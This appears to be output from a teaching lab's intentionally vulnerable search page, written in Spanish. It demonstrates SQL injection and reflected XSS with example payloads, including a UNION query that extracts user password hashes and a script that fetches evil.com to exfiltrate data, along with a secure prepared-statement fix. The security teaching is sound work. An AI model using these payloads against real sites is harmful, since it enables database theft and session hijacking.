Resultados de Busqueda

Busqueda:

SQL INJECTION!

Se detecto un intento de SQL Injection
En un sistema real, esto habria sido bloqueado por un WAF o causado un error. Aqui lo dejamos pasar para que veas el efecto.

Query ejecutada (visible solo en el lab)

SELECT * FROM clients WHERE name LIKE '%<img src=x onerror=alert('XSS')>%'

XSS!

Se detecto contenido HTML/JS en el input
El script se ejecuto, PERO esta mitigado:

document.cookie esta vacio (HttpOnly)
fetch() a externos bloqueado (CSP)
No se puede cargar BeEF ni scripts externos (CSP)

Error de base de datos:

Error MySQL: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'XSS')>%'' at line 1

Payloads de ejemplo

SQL Injection

XSS (mitigado con CSP + HttpOnly)

Este endpoint es doblemente vulnerable:

SQL Injection: La query se arma concatenando el input directamente
XSS reflejado: Los resultados se muestran sin escapar

Mitigacion aplicada: CSP bloquea conexiones externas + cookie HttpOnly. El XSS ejecuta (alert funciona) pero no puede robar sesion ni contactar servidores externos.

# Ver todos los clientes (bypass del filtro)
?q=' OR '1'='1

# Extraer tabla users con UNION
?q=' UNION SELECT id,username,password_md5,email,role,created_at,7,8 FROM users-- 

# XSS basico (FUNCIONA - el alert se ejecuta)
?q=<script>alert('XSS ejecutado!')</script>

# XSS robo de cookie (FALLA - cookie es HttpOnly)
?q=<script>alert(document.cookie)</script>
# Resultado: cookie vacia porque es HttpOnly

# XSS exfiltracion (BLOQUEADO por CSP)
?q=<script>fetch('http://evil.com/steal?data=test')</script>
# Resultado: CSP bloquea la conexion externa

Herramientas: SQLMap Burp Suite curl

// ESTE ARCHIVO (vulnerable pero mitigado):
// CSP: script-src 'self' 'unsafe-inline'; connect-src 'self'
// Cookie: HttpOnly + SameSite=Strict

// El XSS ejecuta PERO:
// - No puede leer document.cookie (HttpOnly)
// - No puede hacer fetch() a externos (CSP connect-src)
// - No puede cargar scripts externos (CSP script-src)

// buscar_secure.php (seguro):
$stmt = $pdo->prepare("SELECT * FROM clients WHERE name LIKE ?");
$stmt->execute(['%' . $search . '%']);
echo htmlspecialchars($row['name']); // CON escapar